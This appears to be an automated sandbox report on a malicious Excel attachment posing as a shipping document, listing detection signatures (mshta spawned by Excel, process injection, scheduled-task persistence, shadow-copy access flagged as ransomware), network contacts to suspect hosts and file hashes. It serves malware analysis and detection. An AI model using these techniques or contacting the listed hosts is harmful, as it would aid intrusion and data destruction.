"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 768 wrote to memory of 3940 (2 events) N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 141.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/768-0-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-1-0x00007FFB2874D000-0x00007FFB2874E000-memory.dmp

memory/768-2-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-3-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-4-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-6-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-5-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-7-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-8-0x00007FFAE6360000-0x00007FFAE6370000-memory.dmp

memory/768-9-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-10-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-11-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-12-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-13-0x00007FFAE6360000-0x00007FFAE6370000-memory.dmp

memory/768-15-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-14-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-19-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-16-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-17-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-18-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-20-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-40-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-43-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-47-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/768-48-0x00007FFB2874D000-0x00007FFB2874E000-memory.dmp

memory/768-49-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-53-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp

memory/3940-54-0x00007FF6DEBD0000-0x00007FF6DEBD8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 0bc1a7e10bfc93dd83ebfe412bdce0c4
SHA1 ab4b865243a6eb3207edf04fa39e31634a46bfaf
SHA256 e65776bbed99d0a78ceb04007acc55234ac117262113cf7caf997a67e72336e7
SHA512 f7797750983d75132998cd164656116cc4852339732a0f844ab0fe0590a8789999907af8f88fc0fe8ab22142b5d89aabe8b35aac3ac00a6b7f9583250834536d